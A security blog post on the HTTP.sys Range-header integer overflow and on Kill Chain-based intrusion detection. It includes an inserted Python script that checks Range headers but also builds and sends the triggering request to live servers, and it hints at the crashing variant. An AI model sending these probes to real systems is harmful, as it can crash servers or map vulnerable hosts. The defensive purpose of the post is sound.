Just last week Microsoft patched a critical vulnerability affecting the Windows HTTP stack. An attacker who sends a specially crafted HTTP request to an affected server could exploit it to execute arbitrary code in the context of the System account.
For those who aren't aware already, the HTTP listener in Microsoft IIS is implemented as a kernel-mode device driver called the HTTP protocol stack (HTTP.sys). IIS uses HTTP.sys for the following tasks:
- Routing HTTP requests to the correct request queue.
- Caching of responses in kernel mode.
- Performing all text-based logging for the WWW service.
- Implementing Quality of Service (QoS) functionality, which includes connection limits, connection timeouts, queue-length limits, and bandwidth throttling.
The problem stems from HTTP.sys not safely handling the Range header of an HTTP request. The Range header asks the server for only part of a resource, which is handy for resuming downloads. A byte range whose end value is far too large (the largest 64-bit value, in the public reports) trips an integer overflow in the kernel-mode parser, and because HTTP.sys runs in the kernel, the result is a crash of the whole machine (a blue screen), not just of the web server.
I found these two articles quite useful while researching this vulnerability.
Two pieces of exploit code have been seen in the wild as of this post: one that tests whether a server is vulnerable, and one that crashes it. Mattias Geniar of the hosting provider Nucleus has tracked down one of them and covers it in good detail here.
Microsoft released the patch as part of its most recent Patch Tuesday advisory. For systems that cannot be patched immediately, the bulletin lists disabling IIS kernel caching as a workaround, at a cost in performance.
The vulnerability has been assigned a reference and is further described here.
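To make the mechanics concrete, the following is an added example, not code from the original post and not the exploit code referred to below: a small Python script that applies the Range-header check a WAF or IDS rule would run on a request before it reaches HTTP.sys, builds the widely circulated test request, and classifies the server's reply. The 416-versus-400 mapping follows what was reported publicly for unpatched and patched servers; the host name example.test is a placeholder.

```python
import re
import socket

# Largest unsigned 64-bit integer. Public write-ups of the HTTP.sys bug
# identified a last-byte-pos of this value as the trigger for the overflow.
UINT64_MAX = 2**64 - 1
TRIGGER_RANGE = "bytes=0-18446744073709551615"

_BYTES_RANGE = re.compile(r"^bytes=(.+)$", re.IGNORECASE)


def range_overflows(range_value):
    """Return True if a Range header value contains a byte range whose
    last-byte-pos is at or beyond the 64-bit maximum, so that the
    kernel's end+1 / length arithmetic would wrap around.

    Only RFC 7233 byte ranges are considered; other units, open-ended
    ranges ("500-") and suffix ranges ("-500") return False.
    """
    m = _BYTES_RANGE.match(range_value.strip())
    if not m:
        return False
    for spec in m.group(1).split(","):
        first, sep, last = spec.strip().partition("-")
        if not sep or not last.isdigit():
            continue  # open-ended, malformed, or no last-byte-pos
        if int(last) >= UINT64_MAX:
            return True
    return False


def build_probe(host, path="/"):
    """Raw HTTP/1.1 request carrying the triggering byte range."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {TRIGGER_RANGE}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def classify_response(raw):
    """Map the server's raw response to a verdict.

    Publicly reported behaviour: an unpatched HTTP.sys answers the probe
    with 416 Requested Range Not Satisfiable, while a patched one rejects
    the header with 400 and the text 'The request has an invalid header
    name'. Anything else (200, 206, a proxy stripping the header) is
    inconclusive rather than a clean bill of health.
    """
    if isinstance(raw, bytes):
        raw = raw.decode("latin-1", "replace")
    status_line = raw.split("\r\n", 1)[0]
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    if not m:
        return "no-http-response"
    code = int(m.group(1))
    if code == 416:
        return "vulnerable"
    if code == 400 and "invalid header name" in raw.lower():
        return "patched"
    return "inconclusive"


def probe(host, port=80, timeout=5.0):
    """Send the probe to a live server and return the verdict.
    Run this only against systems you are authorised to test: the request
    is parsed by the very kernel-mode code that is known to be unsafe."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while len(b"".join(chunks)) < 65536:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify_response(b"".join(chunks))


if __name__ == "__main__":
    import sys
    # example.test is a placeholder; pass a real, authorised target instead.
    target = sys.argv[1] if len(sys.argv) > 1 else "example.test"
    print(target, probe(target))
```

Note that range_overflows flags the crashing variant (a non-zero first-byte-pos with the same huge end value) as well as the harmless-looking test request, which is the behaviour you want from an inline rule: the parser, not the caller, decides which one brings the box down.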
Detecting zero-day attacks
Software and hardware are bound to have bugs, because they are written by human beings. The best way to detect exploitation of those bugs is a holistic approach to intrusion detection. One effective framework for thinking about cyber defence is the Cyber Kill Chain, originally created by Lockheed Martin. It is a very interesting framework and I will cover it in more detail in a later post; briefly, it models every attack as a sequence of stages that the adversary must work through to accomplish his or her mission.
In this framework the vulnerability itself is used at only one of the seven stages, the Exploitation stage; the others are reconnaissance, weaponization, delivery, installation, command and control, and actions on objectives. Detection mechanisms tuned to anomalies at the other stages, both before exploitation (reconnaissance, weaponization, delivery) and after it (installation, command and control, actions on objectives), give us a chance to break the chain even when the exploit itself is unknown to us, which is exactly the situation with a zero-day. Whatever payload an attacker lands through HTTP.sys still has to persist on the host or call home, and those steps can be detected independently of the exploit that got it there.
To quote from the Lockheed Martin paper:
Using a kill chain model to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization of this approach reduces the likelihood of adversary success, informs network defense investment and resource prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent threats necessitates an intelligence-based model because in this model the defenders mitigate not just vulnerability, but the threat component of risk, too.
Hence, I believe that to keep pace with adversaries who use zero-day exploits to accomplish their missions, enterprises must evolve from signature- and discrete-event-based detection to a holistic, Cyber Kill Chain-based intrusion detection approach.
This is a very interesting topic, and I will be talking more about it in my forthcoming posts on this blog.
Title Image Courtesy: slashgear.com